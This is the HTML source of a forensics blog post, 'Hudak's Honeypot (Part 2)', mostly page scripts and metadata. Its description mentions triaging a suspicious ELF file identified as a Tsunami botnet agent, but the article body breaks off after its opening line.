<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">

<title>Hudak&#8217;s Honeypot (Part 2) &#8211; Righteous IT</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//s2.wp.com' />
<link rel='dns-prefetch' href='//s1.wp.com' />
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.pubmine.com' />
<link rel='dns-prefetch' href='//x.bidswitch.net' />
<link rel='dns-prefetch' href='//static.criteo.net' />
<link rel='dns-prefetch' href='//ib.adnxs.com' />
<link rel='dns-prefetch' href='//aax.amazon-adsystem.com' />
<link rel='dns-prefetch' href='//bidder.criteo.com' />
<link rel='dns-prefetch' href='//cas.criteo.com' />
<link rel='dns-prefetch' href='//gum.criteo.com' />
<link rel='dns-prefetch' href='//ads.pubmatic.com' />
<link rel='dns-prefetch' href='//gads.pubmatic.com' />
<link rel='dns-prefetch' href='//tpc.googlesyndication.com' />
<link rel='dns-prefetch' href='//ad.doubleclick.net' />
<link rel='dns-prefetch' href='//googleads.g.doubleclick.net' />
<link rel='dns-prefetch' href='//www.googletagservices.com' />
<link rel='dns-prefetch' href='//cdn.switchadhub.com' />
<link rel='dns-prefetch' href='//delivery.g.switchadhub.com' />
<link rel='dns-prefetch' href='//delivery.swid.switchadhub.com' />
<link rel='dns-prefetch' href='//a.teads.tv' />
<link rel='dns-prefetch' href='//prebid.media.net' />
<link rel='dns-prefetch' href='//adserver-us.adtech.advertising.com' />
<link rel='dns-prefetch' href='//fastlane.rubiconproject.com' />
<link rel='dns-prefetch' href='//prebid-server.rubiconproject.com' />
<link rel='dns-prefetch' href='//hb-api.omnitagjs.com' />
<link rel='dns-prefetch' href='//mtrx.go.sonobi.com' />
<link rel='dns-prefetch' href='//apex.go.sonobi.com' />
<link rel='dns-prefetch' href='//u.openx.net' />
<link rel="alternate" type="application/rss+xml" title="Righteous IT &raquo; Feed" href="https://righteousit.wordpress.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Righteous IT &raquo; Comments Feed" href="https://righteousit.wordpress.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Righteous IT &raquo; Hudak&#8217;s Honeypot (Part&nbsp;2) Comments Feed" href="https://righteousit.wordpress.com/2021/12/21/hudaks-honeypot-part-2/feed/" />
	<script type="text/javascript">
		/* <![CDATA[ */
		function addLoadEvent(func) {
			var oldonload = window.onload;
			if (typeof window.onload != 'function') {
				window.onload = func;
			} else {
				window.onload = function () {
					oldonload();
					func();
				}
			}
		}
		/* ]]> */
	</script>
	<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/s0.wp.com\/wp-includes\/js\/wp-emoji-release.min.js?m=1625065786h&ver=5.9.1-RC1-52785"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='all-css-0-1' href='https://s1.wp.com/_static/??-eJyNkF1OAzEMhC9EElLowgviLNnEitw6P4qTVrk92xXdLltBeRx5vvHY6pyFTbFCrCo0kal5jKzO2aYgOCBB3yhpmZ/UChsp+RuYijOOlac0GrrzrlYUIFPBiZy4btRfGOERWB2gZmOPYlZ39qvXt0mOUPw0KaBOeicHqdXYkNyl9hwwFlO64toJliCMlpq77GEVwKEBgjAXWYlMpkMRBN7YLgPGx/g0W+sf0O/l56arm01PrQpf0G1q/zuimIrR8wPcpm9sJ/W71IIxZAJR4DQ90SHXxSGWoM/woYfX/bB/088vhy84AeLI?cssminify=yes' type='text/css' media='all' />
<style id='wp-block-library-inline-css'>
.has-text-align-justify {
	text-align:justify;
}
</style>
<style id='global-styles-inline-css'>
body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
</style>
<link rel='stylesheet' id='all-css-2-1' href='https://s0.wp.com/_static/??-eJyNjUEOwjAMBD9EsAqoCgfEW+pgQcBOrDpR1d9jwbEcuOxhNbMLi4ZUS6PSQHpQ7vdcDFKdyXvRqYETQrc8EZM4tk9mO/itLepOQNSZzIKn5C6hPVy0jfetQTsCZ/S/A1hbmf4BHQHkml6f2atchnE4nmMc4+n5BvkoTV0=?cssminify=yes' type='text/css' media='all' />
<link crossorigin="anonymous" rel='stylesheet' id='libre-2-fonts-css'  href='https://fonts.googleapis.com/css?family=Libre+Baskerville%3A400%2C400italic%2C700&#038;subset=latin%2Clatin-ext' media='all' />
<link rel='stylesheet' id='all-css-4-1' href='https://s1.wp.com/_static/??-eJzTLy/QTc7PK0nNK9HPLdUtyClNz8wr1k9PzdfNyU9OLMnMz0Ph6KblJGYW6SUXF+voY9dalJqUk58OZKbrA1UhcUGa7HNtDU1MLU1MLMwNTbIAmkQtqg==?cssminify=yes' type='text/css' media='all' />
<link rel='stylesheet' id='print-css-5-1' href='https://s2.wp.com/wp-content/mu-plugins/global-print/global-print.css?m=1465851035h&cssminify=yes' type='text/css' media='print' />
<style id='jetpack-global-styles-frontend-style-inline-css'>
:root { --font-headings: unset; --font-base: unset; --font-headings-default: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif; --font-base-default: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;}
</style>
<link rel='stylesheet' id='all-css-8-1' href='https://s0.wp.com/_static/??-eJx1zc0OAiEMBOAXstafxejB+CxAWKgplFDIxrdXD3sw6mkyyXwZXCp4KT2UjnlA5RGpKFbRDjNbaqjJNipxza1X3eBvpeLJMrBE+SxfqKeQw+tmOGRyLcABqXjU/uAAS/WS/5E0YWRxlt+DW77uT8ezMTtzme5Px85KmQ==?cssminify=yes' type='text/css' media='all' />
<script id='jetpack_related-posts-js-extra'>
var related_posts_js_options = {"post_heading":"h4"};
</script>
<script id='wpcom-actionbar-placeholder-js-extra'>
var actionbardata = {"siteID":"6525939","siteURL":"http:\/\/righteousit.wordpress.com","xhrURL":"https:\/\/righteousit.wordpress.com\/wp-admin\/admin-ajax.php","nonce":"b60885b42d","isLoggedIn":"","statusMessage":"","subsEmailDefault":"instantly","proxyScriptUrl":"https:\/\/s0.wp.com\/wp-content\/js\/wpcom-proxy-request.js?ver=20211021","shortlink":"https:\/\/wp.me\/prnH5-7L","i18n":{"followedText":"New posts from this site will now appear in your <a href=\"https:\/\/wordpress.com\/read\">Reader<\/a>","foldBar":"Collapse this bar","unfoldBar":"Expand this bar"}};
</script>
<script crossorigin='anonymous' type='text/javascript' src='https://s1.wp.com/_static/??-eJyFjksOwjAMRC+EGxAVFQvEWdLERInyw07U9vYEQVHVDSvLnjczFlMGlWLBWIRjEdJoPUJlJGnaDWx8pM7xQWy4UCH7amxkQehlQQ05cdlte1dLJ18gU5qXVbNR+aqR36J7VqTlO7pg418IgjXUCrfw2jb6ZH5fTom01AzKS+ZPkAoZuNSx+e7hdrqch+HY99fBvQAktWVR'></script>
<script type='text/javascript'>
	window.addEventListener( 'DOMContentLoaded', function() {
		rltInitialize( {"token":null,"iframeOrigins":["https:\/\/widgets.wp.com"]} );
	} );
</script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://righteousit.wordpress.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://s1.wp.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress.com" />
<link rel="canonical" href="https://righteousit.wordpress.com/2021/12/21/hudaks-honeypot-part-2/" />
<link rel='shortlink' href='https://wp.me/prnH5-7L' />
<link rel="alternate" type="application/json+oembed" href="https://public-api.wordpress.com/oembed/?format=json&amp;url=https%3A%2F%2Frighteousit.wordpress.com%2F2021%2F12%2F21%2Fhudaks-honeypot-part-2%2F&amp;for=wpcom-auto-discovery" /><link rel="alternate" type="application/xml+oembed" href="https://public-api.wordpress.com/oembed/?format=xml&amp;url=https%3A%2F%2Frighteousit.wordpress.com%2F2021%2F12%2F21%2Fhudaks-honeypot-part-2%2F&amp;for=wpcom-auto-discovery" />
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Hudak&#8217;s Honeypot (Part 2)" />
<meta property="og:url" content="https://righteousit.wordpress.com/2021/12/21/hudaks-honeypot-part-2/" />
<meta property="og:description" content="This is Part 2 in a series. Part 1 is here. During my triage I noticed a suspicious file /var/tmp/dk86. It&#8217;s a 64-bit Linux ELF executable, owned by user &#8220;daemon&#8221;, created 2021-11…" />
<meta property="article:published_time" content="2021-12-21T12:30:00+00:00" />
<meta property="article:modified_time" content="2021-12-21T05:49:36+00:00" />
<meta property="og:site_name" content="Righteous IT" />
<meta property="og:image" content="https://s0.wp.com/i/blank.jpg" />
<meta property="og:image:alt" content="" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:text:title" content="Hudak&#8217;s Honeypot (Part&nbsp;2)" />
<meta name="twitter:card" content="summary" />
<meta property="fb:app_id" content="249643311490" />
<meta property="article:publisher" content="https://www.facebook.com/WordPresscom" />

<!-- End Jetpack Open Graph Tags -->
<link rel="shortcut icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" />
<link rel="icon" type="image/x-icon" href="https://s1.wp.com/i/favicon.ico" sizes="16x16 24x24 32x32 48x48" />
<link rel="apple-touch-icon" href="https://s2.wp.com/i/webclip.png" />
<link rel='openid.server' href='https://righteousit.wordpress.com/?openidserver=1' />
<link rel='openid.delegate' href='https://righteousit.wordpress.com/' />
<link rel="search" type="application/opensearchdescription+xml" href="https://righteousit.wordpress.com/osd.xml" title="Righteous IT" />
<link rel="search" type="application/opensearchdescription+xml" href="https://s1.wp.com/opensearch.xml" title="WordPress.com" />
<meta name="application-name" content="Righteous IT" /><meta name="msapplication-window" content="width=device-width;height=device-height" /><meta name="msapplication-tooltip" content="Join the crusade!" /><meta name="msapplication-task" content="name=Subscribe;action-uri=https://righteousit.wordpress.com/feed/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=Sign up for a free blog;action-uri=http://wordpress.com/signup/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Support;action-uri=http://support.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="msapplication-task" content="name=WordPress.com Forums;action-uri=http://forums.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /><meta name="description" content="This is Part 2 in a series. Part 1 is here. During my triage I noticed a suspicious file /var/tmp/dk86. It&#039;s a 64-bit Linux ELF executable, owned by user &quot;daemon&quot;, created 2021-11-11 19:09:51 UTC. MD5 checksum is d9f82dbf8733f15f97fb352467c9ab21, and searching that on VirusTotal indicates that this is a Tsunami botnet agent. Strings in the binary&hellip;" />
		<script type="text/javascript">

			window.doNotSellCallback = function() {

				var linkElements = [
					'a[href="https://wordpress.com/?ref=footer_blog"]',
					'a[href="https://wordpress.com/?ref=footer_website"]',
					'a[href="https://wordpress.com/?ref=vertical_footer"]',
					'a[href^="https://wordpress.com/?ref=footer_segment_"]',
				].join(',');

				var dnsLink = document.createElement( 'a' );
				dnsLink.href = 'https://wordpress.com/advertising-program-optout/';
				dnsLink.classList.add( 'do-not-sell-link' );
				dnsLink.rel = 'nofollow';
				dnsLink.style.marginLeft = '0.5em';
				dnsLink.textContent = 'Do Not Sell My Personal Information';

				var creditLinks = document.querySelectorAll( linkElements );

				if ( 0 === creditLinks.length ) {
					return false;
				}

				Array.prototype.forEach.call( creditLinks, function( el ) {
					el.insertAdjacentElement( 'afterend', dnsLink );
				});

				return true;
			};

		</script>
		<script id="cmp-configuration" type="application/configuration">{"gvlVersion":"131","consentLanguage":"EN","locale":"en","vendorsAll":"BEtr_6__7a_s_3_f__9ujzGr_v9e9_yGccL5tv3gu5f635ei_-wnZou_VNXBVyPEl27YJCBto5k6iak2LVEqteY9jUmzlORpRPZck09jL2zrAw9p8_sofzBTPf_f__7_e-f___v_2_ue__r___7v__3__18b__Pv__________________________AA","vendorsLegInterest":"BEsAkw1LyALsyxwZNo0qhRAjCsJCoBQAUUAwtEVgA4OCnZWAT6ghYAITUBGBECDEFGDAIABBIAkIiAkALBAIgCIBAACAFGAhAARMAgsALAwCAAUA0LEAKAAQJCDI4KjlMCAqRaKCWysQSgr2NMIAyzwIoFEZFQAI1miBYGQkLBzHAEgJeLJA8xQvkAAA","ajaxNonce":"db24b8d7d4","modulePath":"https:\/\/s1.wp.com\/wp-content\/blog-plugins\/wordads-classes\/js\/","gvlPath":"https:\/\/public-api.wordpress.com\/wpcom\/v2\/sites\/6525939\/cmp\/vendors\/en\/","_":{"title":"Privacy & Cookies","intro":"We, WordPress.com, and our advertising partners store and\/or access information on your device and also process personal data, like unique identifiers, browsing activity, and other standard information sent by your device including your IP address. This information is collected over time and used for personalised ads, ad measurement, audience insights, and product development specific to our ads program. If this sounds good to you, select \"I Agree!\" below.  Otherwise, you can get more information, customize your consent preferences, or decline consent by selecting \"Learn More\". Note that your preferences apply to all websites in the <a href=\"https:\/\/automattic.com\/cookies\/#user-ads-consent\" target=\"_blank\">WordPress.com network<\/a>, and if you change your mind in the future you can update your preferences anytime by visiting the Privacy link displayed under each ad. One last thing, our partners may process some of your data based on legitimate interests instead of consent but you can object to that by choosing \"Learn More\" and then disabling the Legitimate Interests toggle under any listed Purpose or Partner.","config":"Learn More","accept":"I Agree!","viewPartners":"View Partners","error":"We're sorry but an unexpected error occurred. Please try again later."}}</script>		<script type="text/javascript">
		function __ATA_CC() {var v = document.cookie.match('(^|;) ?personalized-ads-consent=([^;]*)(;|$)');return v ? 1 : 0;}
		var __ATA_PP = { 'pt': 1, 'ht': 0, 'tn': 'libre-2', 'uloggedin': 0, 'amp': false, 'consent': __ATA_CC(), 'gdpr_applies': true, 'ad': { 'label': { 'text': 'Advertisements' }, 'reportAd': { 'text': 'Report this ad' }, 'privacySettings': { 'text': 'Privacy', 'onClick': function() { window.__tcfapi && window.__tcfapi( 'showUi' ) } } }, 'siteid': 8982, 'blogid': 6525939, 'js_hint': 'tcf2_test' };
		var __ATA = __ATA || {};
		__ATA.cmd = __ATA.cmd || [];
		__ATA.criteo = __ATA.criteo || {};
		__ATA.criteo.cmd = __ATA.criteo.cmd || [];
		</script>
		<script type="text/javascript">
		(function(){var g=Date.now||function(){return+new Date};function h(a,b){a:{for(var c=a.length,d="string"==typeof a?a.split(""):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a)){b=e;break a}b=-1}return 0>b?null:"string"==typeof a?a.charAt(b):a[b]};function k(a,b,c){c=null!=c?"="+encodeURIComponent(String(c)):"";if(b+=c){c=a.indexOf("#");0>c&&(c=a.length);var d=a.indexOf("?");if(0>d||d>c){d=c;var e=""}else e=a.substring(d+1,c);a=[a.substr(0,d),e,a.substr(c)];c=a[1];a[1]=b?c?c+"&"+b:b:c;a=a[0]+(a[1]?"?"+a[1]:"")+a[2]}return a};var l=0;function m(a,b){var c=document.createElement("script");c.src=a;c.onload=function(){b&&b(void 0)};c.onerror=function(){b&&b("error")};a=document.getElementsByTagName("head");var d;a&&0!==a.length?d=a[0]:d=document.documentElement;d.appendChild(c)}function n(a){var b=void 0===b?document.cookie:b;return(b=h(b.split("; "),function(c){return-1!=c.indexOf(a+"=")}))?b.split("=")[1]:""}function p(a){return"string"==typeof a&&0<a.length}
		function r(a,b,c){b=void 0===b?"":b;c=void 0===c?".":c;var d=[];Object.keys(a).forEach(function(e){var f=a[e],q=typeof f;"object"==q&&null!=f||"function"==q?d.push(r(f,b+e+c)):null!==f&&void 0!==f&&(e=encodeURIComponent(b+e),d.push(e+"="+encodeURIComponent(f)))});return d.filter(p).join("&")}function t(a,b){a||((window.__ATA||{}).config=b.c,m(b.url))}var u=Math.floor(1E13*Math.random()),v=window.__ATA||{};window.__ATA=v;window.__ATA.cmd=v.cmd||[];v.rid=u;v.createdAt=g();var w=window.__ATA||{},x="s.pubmine.com";
		w&&w.serverDomain&&(x=w.serverDomain);var y="//"+x+"/conf",z=window.top===window,A=window.__ATA_PP&&window.__ATA_PP.gdpr_applies,B="boolean"===typeof A?Number(A):null,C=window.__ATA_PP||null,D=z?document.referrer?document.referrer:null:null,E=z?window.location.href:document.referrer?document.referrer:null,F,G=n("__ATA_tuuid");F=G?G:null;var H=window.innerWidth+"x"+window.innerHeight,I=n("usprivacy"),J=r({gdpr:B,pp:C,rid:u,src:D,ref:E,tuuid:F,vp:H,us_privacy:I?I:null},"",".");
		(function(a){var b=void 0===b?"cb":b;l++;var c="callback__"+g().toString(36)+"_"+l.toString(36);a=k(a,b,c);window[c]=function(d){t(void 0,d)};m(a,function(d){d&&t(d)})})(y+"?"+J);}).call(this);
		</script><link rel="amphtml" href="https://righteousit.wordpress.com/2021/12/21/hudaks-honeypot-part-2/amp/"><script type="text/javascript">
	window.google_analytics_uacct = "UA-52447-2";
</script>

<script type="text/javascript">
	var _gaq = _gaq || [];
	_gaq.push(['_setAccount', 'UA-52447-2']);
	_gaq.push(['_gat._anonymizeIp']);
	_gaq.push(['_setDomainName', 'wordpress.com']);
	_gaq.push(['_initData']);
	_gaq.push(['_trackPageview']);

	(function() {
		var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
		ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
		(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga);
	})();
</script>
</head>

<body class="post-template-default single single-post postid-481 single-format-standard wp-embed-responsive customizer-styles-applied no-sidebar singular highlander-enabled highlander-light">
<div class="site-wrapper">
	<div id="page" class="hfeed site">
		<a class="skip-link screen-reader-text" href="#content">Skip to content</a>
				<header id="masthead" class="site-header" role="banner">
			<div class="site-branding">
																						<p class="site-title"><a href="https://righteousit.wordpress.com/" rel="home">Righteous IT</a></p>
										<p class="site-description">Join the crusade!</p>
							</div><!-- .site-branding -->

			<div class="nav-wrapper">
				<nav id="site-navigation" class="main-navigation" role="navigation">
					<button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false">&#9776; Menu</button>
					<div id="primary-menu" class="menu"><ul>
<li class="page_item page-item-2"><a href="https://righteousit.wordpress.com/about/">About</a></li>
</ul></div>
									</nav><!-- #site-navigation -->

							</div>

		</header><!-- #masthead -->

		<div id="content" class="site-content">

	<div id="primary" class="content-area">
		<main id="main" class="site-main" role="main">

		
			
<article id="post-481" class="post-481 post type-post status-publish format-standard hentry category-uncategorized tag-dfir tag-forensics tag-linux">
		<header class="entry-header">
		<h1 class="entry-title">Hudak&#8217;s Honeypot (Part&nbsp;2)</h1>
		<div class="entry-meta">
			<span class="posted-on">Posted on <a href="https://righteousit.wordpress.com/2021/12/21/hudaks-honeypot-part-2/" rel="bookmark"><time class="entry-date published" datetime="2021-12-21T05:30:00-07:00">December 21, 2021</time><time class="updated" datetime="2021-12-20T22:49:36-07:00">December 20, 2021</time></a></span><span class="byline"> by <span class="author vcard"><a class="url fn n" href="https://righteousit.wordpress.com/author/halpomeranz/">Hal Pomeranz</a></span></span>		</div><!-- .entry-meta -->
	</header><!-- .entry-header -->

	<div class="entry-content">
		
<p><em>This is Part 2 in a series. Part 1 is <a href="https://righteousit.wordpress.com/2021/12/20/hudaks-honeypot-part-1/" target="_blank" rel="noreferrer noopener">here</a>.</em></p>



